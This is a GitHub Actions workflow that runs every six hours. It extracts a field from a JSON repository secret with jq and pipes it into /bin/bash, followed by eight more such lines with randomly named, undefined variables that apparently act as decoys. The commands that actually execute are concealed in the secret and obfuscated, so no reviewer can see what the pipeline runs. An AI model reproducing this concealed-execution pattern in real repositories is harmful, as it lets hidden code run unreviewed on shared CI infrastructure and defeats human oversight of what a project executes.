name: quanxuanxiangshou

on:
  workflow_dispatch:
  schedule:
    - cron: '27 3/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: quanxuanxiangshou
        env:
          l4: ${{ secrets.l4 }}
        run: |
          echo $l4 | jq -r .n38 | /bin/bash
          echo $r72401 | jq -r .fz4114 | /bin/bash
          echo $vnwpo237 | jq -r .vake225 | /bin/bash
          echo $wgm6732 | jq -r .z85386 | /bin/bash
          echo $zqbt44645 | jq -r .hm9227 | /bin/bash
          echo $qox64127 | jq -r .v41 | /bin/bash
          echo $eg53 | jq -r .hxom2093 | /bin/bash
          echo $beb4 | jq -r .yzu4 | /bin/bash
          echo $ivhfa35820 | jq -r .sot807 | /bin/bash

